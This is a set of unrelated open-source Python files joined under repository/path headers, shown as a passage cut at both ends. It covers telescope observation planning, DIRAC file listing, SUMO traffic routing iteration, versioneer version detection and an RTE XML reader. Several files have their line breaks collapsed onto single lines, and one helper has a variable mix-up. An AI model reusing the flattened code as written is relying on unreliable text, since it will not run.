            b=b.GetWindow( )
            b.SetBackgroundColour( self.scanningColour)
            b.SetFocus( )
            b.Update( )
            # NOTE(review): reading the letter only happens on this branch in
            # the collapsed original -- confirm intended nesting
            if self.voice and self.labels[0][self.ktore[self.kolejnyKrok]] in self.slowo:
                self.parent.stoper2.Stop()
                label = self.labels[ 0 ][self.ktore[self.kolejnyKrok]]
                self.czytajLitere(label)
                self.parent.stoper2.Start(self.timeGap)
        # wrap around at the end of the scan cycle
        if self.kolejnyKrok == len(self.ktore)-1:
            self.kolejnyKrok=0
        else:
            self.kolejnyKrok+=1
CFIS-Octarine/octarine
planning/ph2.py
import json import argparse import numpy import sys import copy from astropy.coordinates import SkyCoord from astropy import units import operator class Program(object): def __init__(self, runid="16BP06", pi_login="gladman"): self.config = {"runid": runid, "pi_login": pi_login, "program_configuration": {"mjdates": [], "observing_blocks": [], "observing_groups": [] }} def add_target(self, target): self.config["program_configuration"]["mjdates"].append(target) def add_observing_block(self, observing_block): self.config["program_configuration"]["observing_blocks"].append(observing_block) def add_observing_group(self, observing_group): self.config["program_configuration"]["observing_groups"].append(observing_group) class Target(object): def __init__(self, filename=None): self.config = json.load(open(filename)) @property def token(self): return self.config["identifier"]["client_token"] @property def mag(self): return self.config["moving_target"]["ephemeris_points"][0]["mag"] @property def coordinate(self): return SkyCoord(self.config["moving_target"]["ephemeris_points"][0]["coordinate"]["ra"], self.config["moving_target"]["ephemeris_points"][0]["coordinate"]["dec"], unit='degree') class ObservingBlock(object): def __init__(self, client_token, target_token): self.config = {"identifier": {"client_token": client_token}, "target_identifier": {"client_token": target_token}, "constraint_identifiers": [{"server_token": "C1"}], "instrument_config_identifiers": [{"server_token": "I1"}]} @property def token(self): return self.config["identifier"]["client_token"] class ObservingGroup(object): def __init__(self, client_token): self.config = {"identifier": {"client_token": client_token}, "observing_block_identifiers": []} def add_ob(self, client_token): self.config["observing_block_identifiers"].append({"client_token": client_token}) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument('ogname') parser.add_argument('mjdates', nargs='+') args = 
parser.parse_args() # Break the mjdates into OBs based on their max mag of source in pointing. cuts = numpy.array([23.0, 23.5, 24.0, 24.5, 25.0, 25.5, 26.0, 30.0]) IC_exptimes = [50, 100, 200, 300, 400, 500, 600, 700] program = Program() ob_tokens = [] mags = {} ob_coordinate = {} for filename in args.mjdates: target = Target(filename) program.add_target(target.config) ob_token = "OB-{}-{}".format(target.token, target.mag) ob = ObservingBlock(ob_token, target.token) idx = (target.mag > cuts).sum() + 4 ob.config["instrument_config_identifiers"] = [{"server_token": "I{}".format(idx)}] program.add_observing_block(ob.config) ob_tokens.append(ob_token) mags[ob_token] = target.mag ob_coordinate[ob_token] = target.coordinate sf = lambda x, y: cmp(x.ra, y.ra) order_tokens = sorted(ob_coordinate, cmp=sf, key=ob_coordinate.get) total_itime = 0 ogs = {} scheduled = {} og_idx = 0 while len(scheduled) < len(ob_tokens): og_idx += 1 og_token = "OG_{}_{}_{}".format(args.ogname, og_idx, 0) sys.stdout.write("{}: ".format(og_token)) og = ObservingGroup(og_token) og_coord = None og_itime = 0 for ob_token in order_tokens: if ob_token not in scheduled: if og_coord is None: og_coord = ob_coordinate[ob_token] if ob_coordinate[ob_token].separation(og_coord) > 30 * units.degree: continue og.add_ob(ob_token) scheduled[ob_token] = True sys.stdout.write("{} ".format(ob_token)) sys.stdout.flush() idx = (mags[ob_token] > cuts).sum() print ob_token, mags[ob_token], idx + 4 og_itime += IC_exptimes[idx] + 40 if og_itime > 3000.0: break break total_itime += og_itime sys.stdout.write(" {}s \n".format(og_itime)) program.add_observing_group(og.config) nrepeats = 0 for repeat in range(nrepeats): total_itime += og_itime og_token = "OG_{}_{}_{}".format(args.ogname, og_idx, repeat + 1) og = copy.deepcopy(og) og.config["identifier"]["client_token"] = og_token program.add_observing_group(og.config) print "Total I-Time: {} hrs".format(total_itime/3600.) 
json.dump(program.config, open('program.json', 'w'), indent=4, sort_keys=True)
vmendez/DIRAC
DataManagementSystem/scripts/dirac-dms-user-lfns.py
#!/usr/bin/env python
########################################################################
# $HeadURL$
########################################################################
"""
Get the list of all the user files.
"""
__RCSID__ = "$Id$"
from DIRAC.Core.Base import Script

# Defaults for the command-line switches registered below.
days = 0
months = 0
years = 0
wildcard = None
baseDir = ''
emptyDirsFlag = False
Script.registerSwitch( "D:", "Days=", "Match files older than number of days [%s]" % days )
Script.registerSwitch( "M:", "Months=", "Match files older than number of months [%s]" % months )
Script.registerSwitch( "Y:", "Years=", "Match files older than number of years [%s]" % years )
Script.registerSwitch( "w:", "Wildcard=", "Wildcard for matching filenames [All]" )
Script.registerSwitch( "b:", "BaseDir=", "Base directory to begin search (default /[vo]/user/[initial]/[username])" )
Script.registerSwitch( "e", "EmptyDirs", "Create a list of empty directories" )
Script.setUsageMessage( '\n'.join( [ __doc__.split( '\n' )[1],
                                     'Usage:',
                                     '  %s [option|cfgfile] ...' % Script.scriptName, ] ) )
Script.parseCommandLine( ignoreErrors = False )

# Switches may arrive under either their short or long name.
for switch in Script.getUnprocessedSwitches():
  if switch[0] == "D" or switch[0].lower() == "days":
    days = int( switch[1] )
  if switch[0] == "M" or switch[0].lower() == "months":
    months = int( switch[1] )
  if switch[0] == "Y" or switch[0].lower() == "years":
    years = int( switch[1] )
  if switch[0].lower() == "w" or switch[0].lower() == "wildcard":
    wildcard = switch[1]
  if switch[0].lower() == "b" or switch[0].lower() == "basedir":
    baseDir = switch[1]
  if switch[0].lower() == "e" or switch[0].lower() == "emptydirs":
    emptyDirsFlag = True

# DIRAC imports must happen after parseCommandLine().
import DIRAC
from DIRAC import gLogger
from DIRAC.ConfigurationSystem.Client.Helpers.Registry import getVOForGroup
from DIRAC.Core.Security.ProxyInfo import getProxyInfo
from DIRAC.Resources.Catalog.FileCatalog import FileCatalog
from DIRAC.Core.Utilities.List import sortList
from datetime import datetime, timedelta
import sys, os, time, fnmatch

fc = FileCatalog()

def isOlderThan( cTimeStruct, days ):
  """Return True when *cTimeStruct* is more than *days* days in the past (UTC)."""
  return cTimeStruct < datetime.utcnow() - timedelta( days = days )

# Creation-time metadata is only needed when an age cut was requested.
withMetadata = False
if days or months or years:
  withMetadata = True

# Convert the requested age to days, approximating months (30) and years (365).
totalDays = 0
if years:
  totalDays += 365 * years
if months:
  totalDays += 30 * months
if days:
  totalDays += days

res = getProxyInfo( False, False )
if not res['OK']:
  gLogger.error( "Failed to get client proxy information.", res['Message'] )
  DIRAC.exit( 2 )
proxyInfo = res['Value']
username = proxyInfo['username']
vo = ''
if 'group' in proxyInfo:
  vo = getVOForGroup( proxyInfo['group'] )
if not baseDir:
  if not vo:
    gLogger.error( 'Could not determine VO' )
    Script.showHelp()
  # Default user home: /<vo>/user/<initial>/<username>
  baseDir = '/%s/user/%s/%s' % ( vo, username[0], username )
baseDir = baseDir.rstrip( '/' )
gLogger.info( 'Will search for files in %s' % baseDir )

# Depth-first walk of the file catalogue starting at baseDir.
activeDirs = [baseDir]
allFiles = []
emptyDirs = []
while len( activeDirs ) > 0:
  currentDir = activeDirs.pop()
  res = fc.listDirectory( currentDir, withMetadata, timeout = 360 )
  if not res['OK']:
    gLogger.error( "Error retrieving directory contents", "%s %s" % ( currentDir, res['Message'] ) )
  elif currentDir in res['Value']['Failed']:
    gLogger.error( "Error retrieving directory contents", "%s %s" % ( currentDir, res['Value']['Failed'][currentDir] ) )
  else:
    dirContents = res['Value']['Successful'][currentDir]
    subdirs = dirContents['SubDirs']
    files = dirContents['Files']
    if not subdirs and not files:
      emptyDirs.append( currentDir )
      gLogger.notice( '%s: empty directory' % currentDir )
    else:
      for subdir in sorted( subdirs, reverse = True ):
        # Only descend into directories old enough to possibly hold matches.
        if ( not withMetadata ) or isOlderThan( subdirs[subdir]['CreationDate'], totalDays ):
          activeDirs.append( subdir )
      for filename in sorted( files ):
        fileOK = False
        if ( not withMetadata ) or isOlderThan( files[filename]['MetaData']['CreationDate'], totalDays ):
          if wildcard is None or fnmatch.fnmatch( filename, wildcard ):
            fileOK = True
        # Drop files failing the age/wildcard filters; iteration is safe
        # because sorted() already produced a list copy of the keys.
        if not fileOK:
          files.pop( filename )
      allFiles += sorted( files )
      gLogger.notice( "%s: %d files%s, %d sub-directories" % ( currentDir, len( files ), ' matching' if withMetadata or wildcard else '', len( subdirs ) ) )

outputFileName = '%s.lfns' % baseDir.replace( '/%s' % vo, '%s' % vo ).replace( '/', '-' )
# Bug fix: context managers guarantee the output files are always closed.
with open( outputFileName, 'w' ) as outputFile:
  for lfn in sortList( allFiles ):
    outputFile.write( lfn + '\n' )
gLogger.notice( '%d matched files have been put in %s' % ( len( allFiles ), outputFileName ) )

if emptyDirsFlag:
  outputFileName = '%s.emptydirs' % baseDir.replace( '/%s' % vo, '%s' % vo ).replace( '/', '-' )
  with open( outputFileName, 'w' ) as outputFile:
    # 'emptyDir' avoids shadowing the builtin 'dir'.
    for emptyDir in sortList( emptyDirs ):
      outputFile.write( emptyDir + '\n' )
  gLogger.notice( '%d empty directories have been put in %s' % ( len( emptyDirs ), outputFileName ) )

DIRAC.exit( 0 )
rudhir-upretee/Sumo17_With_Netsim
tools/assign/costFunctionChecker.py
#!/usr/bin/env python """ @file costFunctionChecker.py @author Michael Behrisch @author Daniel Krajzewicz @author Jakob Erdmann @date 2009-08-31 @version $Id: costFunctionChecker.py 13811 2013-05-01 20:31:43Z behrisch $ Run duarouter repeatedly and simulate weight changes via a cost function. SUMO, Simulation of Urban MObility; see http://sumo.sourceforge.net/ Copyright (C) 2009-2013 DLR (http://www.dlr.de/) and contributors All rights reserved """ import os, sys, subprocess, types from datetime import datetime from optparse import OptionParser from xml.sax import make_parser, handler def call(command, log): if not isinstance(args, types.StringTypes): command = [str(c) for c in command] print >> log, "-" * 79 print >> log, command log.flush() retCode = subprocess.call(command, stdout=log, stderr=log) if retCode != 0: print >> sys.stderr, "Execution of %s failed. Look into %s for details." % (command, log.name) sys.exit(retCode) def writeRouteConf(step, options, file, output): fd = open("iteration_" + str(step) + ".duarcfg", "w") print >> fd, """<configuration> <input> <net-file value="%s"/>""" % options.net if step==0: if options.flows: print >> fd, ' <flow-definition value="%s"/>' % file else: print >> fd, ' <trip-defs value="%s"/>' % file else: print >> fd, ' <alternatives value="%s"/>' % file print >> fd, ' <weights value="dump_%s_%s.xml"/>' % (step-1, options.aggregation) print >> fd, """ </input> <output> <output-file value="%s"/> <exit-times value="True"/> </output>""" % output print >> fd, """ <processing> <continue-on-unbuild value="%s"/> <expand-weights value="True"/> <gBeta value="%s"/> <gA value="%s"/> </processing>""" % (options.continueOnUnbuild, options.gBeta, options.gA) print >> fd, ' <random_number><abs-rand value="%s"/></random_number>' % options.absrand print >> fd, ' <time><begin value="%s"/>' % options.begin, if options.end: print >> fd, '<end value="%s"/>' % options.end, print >> fd, """</time> <report> <verbose value="%s"/> <suppress-warnings 
value="%s"/> </report> </configuration>""" % (options.verbose, options.noWarnings) fd.close() class RouteReader(handler.ContentHandler): def __init__(self): self._edgeWeights = {} self._maxDepart = 0 def startElement(self, name, attrs): if name == 'route': for edge in attrs['edges'].split(): if not edge in self._edgeWeights: self._edgeWeights[edge] = 0 self._edgeWeights[edge] += 1 elif name == 'vehicle': if float(attrs['depart']) > self._maxDepart: self._maxDepart = float(attrs['depart']) def getWeight(self, edge): return self._edgeWeights.get(edge, 0) def getMaxDepart(self): return self._maxDepart class NetReader(handler.ContentHandler): def __init__(self): self._edges = [] def startElement(self, name, attrs): if name == 'edge': if not attrs.has_key('function') or attrs['function'] == 'normal': self._edges.append(attrs['id']) def getEdges(self): return self._edges def identity(edge, weight): return weight def generateWeights(step, options, edges, weights, costFunction): fd = open("dump_%s_%s.xml" % (step, options.aggregation), "w") print >> fd, '<?xml version="1.0"?>\n<netstats>' for time in range(0, int(reader.getMaxDepart()+1), options.aggregation): print >> fd, ' <interval begin="%s" end="%s" id="dump_%s">' % (time, time + options.aggregation, options.aggregation) for edge in edges: cost = costFunction(edge, weights.getWeight(edge)) if cost != None: print >> fd, ' <edge id="%s" traveltime="%s"/>' % (edge, cost) print >> fd, ' </interval>' print >> fd, '</netstats>' fd.close() optParser = OptionParser() optParser.add_option("-v", "--verbose", action="store_true", dest="verbose", default=False, help="tell me what you are doing") optParser.add_option("-C", "--continue-on-unbuild", action="store_true", dest="continueOnUnbuild", default=False, help="continues on unbuild routes") optParser.add_option("-w", "--disable-warnings", action="store_true", dest="noWarnings", default=False, help="disables warnings") optParser.add_option("-n", "--net-file", dest="net", 
help="SUMO network (mandatory)", metavar="FILE") optParser.add_option("-t", "--trips", dest="trips", help="trips in step 0 (this or flows is mandatory)", metavar="FILE") optParser.add_option("-F", "--flows", help="flows in step 0 (this or trips is mandatory)", metavar="FILE") optParser.add_option("-+", "--additional", dest="additional", default="", help="Additional files") optParser.add_option("-b", "--begin", dest="begin", type="int", default=0, help="Set simulation/routing begin [default: %default]") optParser.add_option("-e", "--end", dest="end", type="int", help="Set simulation/routing end [default: %default]") optParser.add_option("-R", "--route-steps", dest="routeSteps", type="int", default=200, help="Set simulation route steps [default: %default]") optParser.add_option("-a", "--aggregation", dest="aggregation", type="int", default=900, help="Set main weights aggregation period [default: %default]") optParser.add_option("-A", "--gA", dest="gA", type="float", default=.5, help="Sets Gawron's Alpha [default: %default]") optParser.add_option("-B", "--gBeta", dest="gBeta", type="float", default=.9, help="Sets Gawron's Beta [default: %default]") optParser.add_option("-f", "--first-step", dest="firstStep", type="int", default=0, help="First DUA step [default: %default]") optParser.add_option("-l", "--last-step", dest="lastStep", type="int", default=50, help="Last DUA step [default: %default]") optParser.add_option("-p", "--path", dest="path", default=os.environ.get("SUMO_BINDIR", ""), help="Path to binaries [default: %default]") optParser.add_option("-y", "--absrand", dest="absrand", action="store_true", default=False, help="use current time to generate random number") optParser.add_option("-c", "--cost-function", dest="costfunc", default="identity", help="(python) function to use as cost function") (options, args) = optParser.parse_args() if not options.net or not (options.trips or options.flows): optParser.error("At least --net-file and --trips or --flows have to 
be given!") duaBinary = os.environ.get("DUAROUTER_BINARY", os.path.join(options.path, "duarouter")) log = open("dua-log.txt", "w+") parser = make_parser() reader = NetReader() parser.setContentHandler(reader) parser.parse(options.net) edges = reader.getEdges() if "." in options.costfunc: idx = options.costfunc.rfind(".") module = options.costfunc[:idx] func = options.costfunc[idx+1:] exec("from %s import %s as costFunction" % (module, func)) else: exec("costFunction = %s" % options.costfunc) if options.flows: tripFiles = options.flows.split(",") else: tripFiles = options.trips.split(",") starttime = datetime.now() for step in range(options.firstStep, options.lastStep): btimeA = datetime.now() print "> Executing step " + str(step) # router files = [] for tripFile in tripFiles: file = tripFile tripFile = os.path.basename(tripFile) if step>0: file = tripFile[:tripFile.find(".")] + "_%s.rou.alt.xml" % (step-1) output = tripFile[:tripFile.find(".")] + "_%s.rou.xml" % step print ">> Running router with " + file btime = datetime.now() print ">>> Begin time: %s" % btime writeRouteConf(step, options, file, output) retCode = call([duaBinary, "-c", "iteration_%s.duarcfg" % step], log) etime = datetime.now() print ">>> End time: %s" % etime print ">>> Duration: %s" % (etime-btime) print "<<" files.append(output) # generating weights file print ">> Generating weights" reader = RouteReader() parser.setContentHandler(reader) for f in files: parser.parse(f) generateWeights(step, options, edges, reader, costFunction) print "<<" print "< Step %s ended (duration: %s)" % (step, datetime.now() - btimeA) print "------------------\n" sys.stdout.flush() print "dua-iterate ended (duration: %s)" % (datetime.now() - starttime) log.close()
jacobtomlinson/datapoint-python
datapoint/_version.py
# This file helps to compute a version number in source trees obtained from # git-archive tarball (such as those provided by githubs download-from-tag # feature). Distribution tarballs (built by setup.py sdist) and build # directories (produced by setup.py build) will contain a much shorter file # that just contains the computed version number. # This file is released into the public domain. Generated by # versioneer-0.18 (https://github.com/warner/python-versioneer) """Git implementation of _version.py.""" import errno import os import re import subprocess import sys def get_keywords(): """Get the keywords needed to look up the version information.""" # these strings will be replaced by git during git-archive. # setup.py/versioneer.py will grep for the variable names, so they must # each be defined on a line of their own. _version.py will just call # get_keywords(). git_refnames = "$Format:%d$" git_full = "$Format:%H$" git_date = "$Format:%ci$" keywords = {"refnames": git_refnames, "full": git_full, "date": git_date} return keywords class VersioneerConfig: """Container for Versioneer configuration parameters.""" def get_config(): """Create, populate and return the VersioneerConfig() object.""" # these strings are filled in when 'setup.py versioneer' creates # _version.py cfg = VersioneerConfig() cfg.VCS = "git" cfg.style = "" cfg.tag_prefix = "" cfg.parentdir_prefix = "None" cfg.versionfile_source = "datapoint/_version.py" cfg.verbose = False return cfg class NotThisMethod(Exception): """Exception raised if a method is not valid for the current scenario.""" LONG_VERSION_PY = {} HANDLERS = {} def register_vcs_handler(vcs, method): # decorator """Decorator to mark a method as the handler for a particular VCS.""" def decorate(f): """Store f in HANDLERS[vcs][method].""" if vcs not in HANDLERS: HANDLERS[vcs] = {} HANDLERS[vcs][method] = f return f return decorate def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False, env=None): """Call the given 
command(s).""" assert isinstance(commands, list) p = None for c in commands: try: dispcmd = str([c] + args) # remember shell=False, so use git.cmd on windows, not just git p = subprocess.Popen([c] + args, cwd=cwd, env=env, stdout=subprocess.PIPE, stderr=(subprocess.PIPE if hide_stderr else None)) break except EnvironmentError: e = sys.exc_info()[1] if e.errno == errno.ENOENT: continue if verbose: print("unable to run %s" % dispcmd) print(e) return None, None else: if verbose: print("unable to find command, tried %s" % (commands,)) return None, None stdout = p.communicate()[0].strip() if sys.version_info[0] >= 3: stdout = stdout.decode() if p.returncode != 0: if verbose: print("unable to run %s (error)" % dispcmd) print("stdout was %s" % stdout) return None, p.returncode return stdout, p.returncode def versions_from_parentdir(parentdir_prefix, root, verbose): """Try to determine the version from the parent directory name. Source tarballs conventionally unpack into a directory that includes both the project name and a version string. We will also support searching up two directory levels for an appropriately named parent directory """ rootdirs = [] for i in range(3): dirname = os.path.basename(root) if dirname.startswith(parentdir_prefix): return {"version": dirname[len(parentdir_prefix):], "full-revisionid": None, "dirty": False, "error": None, "date": None} else: rootdirs.append(root) root = os.path.dirname(root) # up a level if verbose: print("Tried directories %s but none started with prefix %s" % (str(rootdirs), parentdir_prefix)) raise NotThisMethod("rootdir doesn't start with parentdir_prefix") @register_vcs_handler("git", "get_keywords") def git_get_keywords(versionfile_abs): """Extract version information from the given file.""" # the code embedded in _version.py can just fetch the value of these # keywords. When used from setup.py, we don't want to import _version.py, # so we do it with a regexp instead. This function is not used from # _version.py. 
keywords = {} try: f = open(versionfile_abs, "r") for line in f.readlines(): if line.strip().startswith("git_refnames ="): mo = re.search(r'=\s*"(.*)"', line) if mo: keywords["refnames"] = mo.group(1) if line.strip().startswith("git_full ="): mo = re.search(r'=\s*"(.*)"', line) if mo: keywords["full"] = mo.group(1) if line.strip().startswith("git_date ="): mo = re.search(r'=\s*"(.*)"', line) if mo: keywords["date"] = mo.group(1) f.close() except EnvironmentError: pass return keywords @register_vcs_handler("git", "keywords") def git_versions_from_keywords(keywords, tag_prefix, verbose): """Get version information from git keywords.""" if not keywords: raise NotThisMethod("no keywords at all, weird") date = keywords.get("date") if date is not None: # git-2.2.0 added "%cI", which expands to an ISO-8601 -compliant # datestamp. However we prefer "%ci" (which expands to an "ISO-8601 # -like" string, which we must then edit to make compliant), because # it's been around since git-1.5.3, and it's too difficult to # discover which version we're using, or to work around using an # older one. date = date.strip().replace(" ", "T", 1).replace(" ", "", 1) refnames = keywords["refnames"].strip() if refnames.startswith("$Format"): if verbose: print("keywords are unexpanded, not using") raise NotThisMethod("unexpanded keywords, not a git-archive tarball") refs = set([r.strip() for r in refnames.strip("()").split(",")]) # starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of # just "foo-1.0". If we see a "tag: " prefix, prefer those. TAG = "tag: " tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)]) if not tags: # Either we're using git < 1.8.3, or there really are no tags. We use # a heuristic: assume all version tags have a digit. The old git %d # expansion behaves like git log --decorate=short and strips out the # refs/heads/ and refs/tags/ prefixes that would let us distinguish # between branches and tags. 
By ignoring refnames without digits, we # filter out many common branch names like "release" and # "stabilization", as well as "HEAD" and "master". tags = set([r for r in refs if re.search(r'\d', r)]) if verbose: print("discarding '%s', no digits" % ",".join(refs - tags)) if verbose: print("likely tags: %s" % ",".join(sorted(tags))) for ref in sorted(tags): # sorting will prefer e.g. "2.0" over "2.0rc1" if ref.startswith(tag_prefix): r = ref[len(tag_prefix):] if verbose: print("picking %s" % r) return {"version": r, "full-revisionid": keywords["full"].strip(), "dirty": False, "error": None, "date": date} # no suitable tags, so version is "0+unknown", but full hex is still there if verbose: print("no suitable tags, using unknown + full revision id") return {"version": "0+unknown", "full-revisionid": keywords["full"].strip(), "dirty": False, "error": "no suitable tags", "date": None} @register_vcs_handler("git", "pieces_from_vcs") def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command): """Get version from 'git describe' in the root of the source tree. This only gets called if the git-archive 'subst' keywords were *not* expanded, and _version.py hasn't already been rewritten with a short version string, meaning we're inside a checked out source tree. 
""" GITS = ["git"] if sys.platform == "win32": GITS = ["git.cmd", "git.exe"] out, rc = run_command(GITS, ["rev-parse", "--git-dir"], cwd=root, hide_stderr=True) if rc != 0: if verbose: print("Directory %s not under git control" % root) raise NotThisMethod("'git rev-parse --git-dir' returned error") # if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty] # if there isn't one, this yields HEX[-dirty] (no NUM) describe_out, rc = run_command(GITS, ["describe", "--tags", "--dirty", "--always", "--long", "--match", "%s*" % tag_prefix], cwd=root) # --long was added in git-1.5.5 if describe_out is None: raise NotThisMethod("'git describe' failed") describe_out = describe_out.strip() full_out, rc = run_command(GITS, ["rev-parse", "HEAD"], cwd=root) if full_out is None: raise NotThisMethod("'git rev-parse' failed") full_out = full_out.strip() pieces = {} pieces["long"] = full_out pieces["short"] = full_out[:7] # maybe improved later pieces["error"] = None # parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty] # TAG might have hyphens. git_describe = describe_out # look for -dirty suffix dirty = git_describe.endswith("-dirty") pieces["dirty"] = dirty if dirty: git_describe = git_describe[:git_describe.rindex("-dirty")] # now we have TAG-NUM-gHEX or HEX if "-" in git_describe: # TAG-NUM-gHEX mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe) if not mo: # unparseable. Maybe git-describe is misbehaving? 
pieces["error"] = ("unable to parse git-describe output: '%s'" % describe_out) return pieces # tag full_tag = mo.group(1) if not full_tag.startswith(tag_prefix): if verbose: fmt = "tag '%s' doesn't start with prefix '%s'" print(fmt % (full_tag, tag_prefix)) pieces["error"] = ("tag '%s' doesn't start with prefix '%s'" % (full_tag, tag_prefix)) return pieces pieces["closest-tag"] = full_tag[len(tag_prefix):] # distance: number of commits since tag pieces["distance"] = int(mo.group(2)) # commit: short hex revision ID pieces["short"] = mo.group(3) else: # HEX: no tags pieces["closest-tag"] = None count_out, rc = run_command(GITS, ["rev-list", "HEAD", "--count"], cwd=root) pieces["distance"] = int(count_out) # total number of commits # commit date: see ISO-8601 comment in git_versions_from_keywords() date = run_command(GITS, ["show", "-s", "--format=%ci", "HEAD"], cwd=root)[0].strip() pieces["date"] = date.strip().replace(" ", "T", 1).replace(" ", "", 1) return pieces def plus_or_dot(pieces): """Return a + if we don't already have one, else return a .""" if "+" in pieces.get("closest-tag", ""): return "." return "+" def render_pep440(pieces): """Build up version string, with post-release "local version identifier". Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty Exceptions: 1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty] """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] if pieces["distance"] or pieces["dirty"]: rendered += plus_or_dot(pieces) rendered += "%d.g%s" % (pieces["distance"], pieces["short"]) if pieces["dirty"]: rendered += ".dirty" else: # exception #1 rendered = "0+untagged.%d.g%s" % (pieces["distance"], pieces["short"]) if pieces["dirty"]: rendered += ".dirty" return rendered def render_pep440_pre(pieces): """TAG[.post.devDISTANCE] -- No -dirty. Exceptions: 1: no tags. 
0.post.devDISTANCE """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] if pieces["distance"]: rendered += ".post.dev%d" % pieces["distance"] else: # exception #1 rendered = "0.post.dev%d" % pieces["distance"] return rendered def render_pep440_post(pieces): """TAG[.postDISTANCE[.dev0]+gHEX] . The ".dev0" means dirty. Note that .dev0 sorts backwards (a dirty tree will appear "older" than the corresponding clean one), but you shouldn't be releasing software with -dirty anyways. Exceptions: 1: no tags. 0.postDISTANCE[.dev0] """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] if pieces["distance"] or pieces["dirty"]: rendered += ".post%d" % pieces["distance"] if pieces["dirty"]: rendered += ".dev0" rendered += plus_or_dot(pieces) rendered += "g%s" % pieces["short"] else: # exception #1 rendered = "0.post%d" % pieces["distance"] if pieces["dirty"]: rendered += ".dev0" rendered += "+g%s" % pieces["short"] return rendered def render_pep440_old(pieces): """TAG[.postDISTANCE[.dev0]] . The ".dev0" means dirty. Eexceptions: 1: no tags. 0.postDISTANCE[.dev0] """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] if pieces["distance"] or pieces["dirty"]: rendered += ".post%d" % pieces["distance"] if pieces["dirty"]: rendered += ".dev0" else: # exception #1 rendered = "0.post%d" % pieces["distance"] if pieces["dirty"]: rendered += ".dev0" return rendered def render_git_describe(pieces): """TAG[-DISTANCE-gHEX][-dirty]. Like 'git describe --tags --dirty --always'. Exceptions: 1: no tags. HEX[-dirty] (note: no 'g' prefix) """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] if pieces["distance"]: rendered += "-%d-g%s" % (pieces["distance"], pieces["short"]) else: # exception #1 rendered = pieces["short"] if pieces["dirty"]: rendered += "-dirty" return rendered def render_git_describe_long(pieces): """TAG-DISTANCE-gHEX[-dirty]. Like 'git describe --tags --dirty --always -long'. The distance/hash is unconditional. Exceptions: 1: no tags. 
HEX[-dirty] (note: no 'g' prefix) """ if pieces["closest-tag"]: rendered = pieces["closest-tag"] rendered += "-%d-g%s" % (pieces["distance"], pieces["short"]) else: # exception #1 rendered = pieces["short"] if pieces["dirty"]: rendered += "-dirty" return rendered def render(pieces, style): """Render the given version pieces into the requested style.""" if pieces["error"]: return {"version": "unknown", "full-revisionid": pieces.get("long"), "dirty": None, "error": pieces["error"], "date": None} if not style or style == "default": style = "pep440" # the default if style == "pep440": rendered = render_pep440(pieces) elif style == "pep440-pre": rendered = render_pep440_pre(pieces) elif style == "pep440-post": rendered = render_pep440_post(pieces) elif style == "pep440-old": rendered = render_pep440_old(pieces) elif style == "git-describe": rendered = render_git_describe(pieces) elif style == "git-describe-long": rendered = render_git_describe_long(pieces) else: raise ValueError("unknown style '%s'" % style) return {"version": rendered, "full-revisionid": pieces["long"], "dirty": pieces["dirty"], "error": None, "date": pieces.get("date")} def get_versions(): """Get version information or return default if unable to do so.""" # I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have # __file__, we can work backwards from there to the root. Some # py2exe/bbfreeze/non-CPython implementations don't do __file__, in which # case we can only use expanded keywords. cfg = get_config() verbose = cfg.verbose try: return git_versions_from_keywords(get_keywords(), cfg.tag_prefix, verbose) except NotThisMethod: pass try: root = os.path.realpath(__file__) # versionfile_source is the relative path from the top of the source # tree (where the .git directory might live) to this file. Invert # this to find the root from __file__. 
for i in cfg.versionfile_source.split('/'): root = os.path.dirname(root) except NameError: return {"version": "0+unknown", "full-revisionid": None, "dirty": None, "error": "unable to find root of source tree", "date": None} try: pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose) return render(pieces, cfg.style) except NotThisMethod: pass try: if cfg.parentdir_prefix: return versions_from_parentdir(cfg.parentdir_prefix, root, verbose) except NotThisMethod: pass return {"version": "0+unknown", "full-revisionid": None, "dirty": None, "error": "unable to compute version", "date": None}
nathanshartmann/portuguese_word_embeddings
sentence_similarity/utils/commons.py
# -*- coding: utf-8 -*-
"""
Common structures and functions used by other scripts.
"""
# cElementTree was removed in Python 3.9; plain ElementTree transparently
# uses the C accelerator since Python 3.3.
from xml.etree import ElementTree as ET

# Mapping between textual entailment labels and their integer codes.
str_to_entailment = {'none': 0, 'entailment': 1, 'paraphrase': 2}
entailment_to_str = {v: k for k, v in str_to_entailment.items()}


class Pair(object):
    '''
    Class representing a pair of texts from SICK or RTE.
    It is meant to be used as an abstract representation for both.
    '''

    def __init__(self, t, h, id_, entailment, similarity):
        '''
        :param t: string with the text
        :param h: string with the hypothesis
        :param id_: int indicating id in the original file
        :param entailment: int indicating entailment class
        :param similarity: float
        '''
        self.t = t
        self.h = h
        self.id = id_
        self.entailment = entailment
        self.similarity = similarity


def read_xml(filename, need_labels):
    '''
    Read an RTE XML file and return a list of Pair objects.

    :param filename: name of the file to read
    :param need_labels: boolean indicating if labels should be present
    :raise ValueError: on an unknown entailment label, or when labels are
        required but a pair carries neither entailment nor similarity
    '''
    pairs = []
    tree = ET.parse(filename)
    root = tree.getroot()

    for xml_pair in root.iter('pair'):
        t = xml_pair.find('t').text
        h = xml_pair.find('h').text
        attribs = dict(xml_pair.items())
        id_ = int(attribs['id'])

        if 'entailment' in attribs:
            ent_string = attribs['entailment'].lower()
            try:
                ent_value = str_to_entailment[ent_string]
            except KeyError:
                # Bug fix: a failed dict lookup raises KeyError, not
                # ValueError, so the friendly message below was unreachable.
                msg = 'Unexpected value for attribute "entailment" at pair {}: {}'
                raise ValueError(msg.format(id_, ent_string))
        else:
            ent_value = None

        if 'similarity' in attribs:
            similarity = float(attribs['similarity'])
        else:
            similarity = None

        if need_labels and similarity is None and ent_value is None:
